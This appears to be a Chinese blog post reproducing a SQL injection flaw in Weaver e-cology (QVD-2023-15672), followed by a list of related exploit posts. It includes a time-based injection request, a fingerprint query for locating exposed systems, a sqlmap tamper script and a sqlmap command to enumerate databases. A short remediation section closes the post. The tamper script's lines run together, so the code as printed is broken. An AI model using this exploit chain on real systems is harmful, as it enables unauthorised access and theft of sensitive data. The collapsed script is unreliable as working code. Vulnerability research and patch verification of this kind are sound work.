泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0x01 产品简介
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
0x02 漏洞概述
由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
0x03 影响范围
Ecology 9.x 补丁版本 < 10.58.0
Ecology 8.x 补丁版本 < 10.58.0
0x04 复现环境
鹰图指纹:
web.icon="41eca7a9245394106a09b2534d8030df"
0x05 漏洞复现
PoC
GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
PS:fileid字段为注入点,post和get都可以,经测试,每注入一次,fileid的值(可随意构造)就需要更换一次 ,不然无法成功(可自行尝试),这也是漏洞比较鸡肋的点。
SQLmap利用思路
编写一个每次请求遍历随机数去配合payload实现注入的tamper脚本
import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMSpriority = PRIORITY.HIGHESTdef tamper(payload, **kwargs):result = ""num = random.randint(1,2**27)result = str(num)+payloadreturn result
把数据包放txt里面
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closefileid=12*&isFromOutImg=1
尝试注入:
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs
效果:
0x06 修复建议
临时缓解方案
限制访问来源地址,如非必要,不要将系统开放在互联网上。
升级修复方案
目前官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#
泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)相关推荐
- 【漏洞报送】泛微E-Office存在SQL注入漏洞(CNVD-2022-43246)
0x01 泛微E-Office 泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用.高效智能的原则,为企业快速 ...
- 泛微OA V8 SQL注入漏洞和文件上传漏洞
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...
- kkcms前台sql注入漏洞复现
kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...
- espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...
- 通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...
- 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...
最新文章
- [转] Nodejs 进阶:Express 常用中间件 body-parser 实现解析
- android的33种常用组件1
- 大众26亿美元投资自动驾驶公司,可这行人才还在继续流失
- 服务器无显示器,服务器无显示器 远程桌面
- webform 的路由
- 中班区域活动设计思路_【年段教研】“小游戏大学问 巧建构促发展” ——石狮实幼中班段年段教研主题建构游戏的组织与开展...
- 什么是单页应用(转)
- centos7优先wifi连接_WIFI明明已连接,但却无法上网,问题究竟出现在哪里?
- 用JavaScript编码URL?
- 手机配置都赶上笔记本了
- python读入图片,可视化展示图片
- python模拟登陆微博_超详细的Python实现微博模拟登陆,小白都能懂
- 土方测量-挖方填方量的计算思路
- C语言求三角形斜边长
- 官网USB读卡器移植(TF卡SDIO模式 + SPI-flash)
- html显示隐藏图片,简单的图片显示与隐藏
- 运营商大数据怎么获客的?一篇文章告诉你
- ArcGIS教程:要素类基础知识(一)
- R型单相隔离变压器如何选择?
- c++11之特性之std::function(书:深入应用c++11)
热门文章
- opencv4android 配置,配置OpenCV4Android开发环境
- 日常英语单词 - 动物
- 【2019.9.25】Za
- 如何复制有版权的光盘
- 智能优化算法——飞蛾扑火优化算法(完整Matlab实现)
- 临时工兼职人员招聘管理小程序开发制作功能介绍
- oracle+exceeds,oracle 导入报错:field in data file exceeds maximum length
- python构建矩阵_python矩阵运算 | 学步园
- 我为儿子关云雷命名的出处
- 超分辨率——基于SRGAN的图像超分辨率重建(Pytorch实现)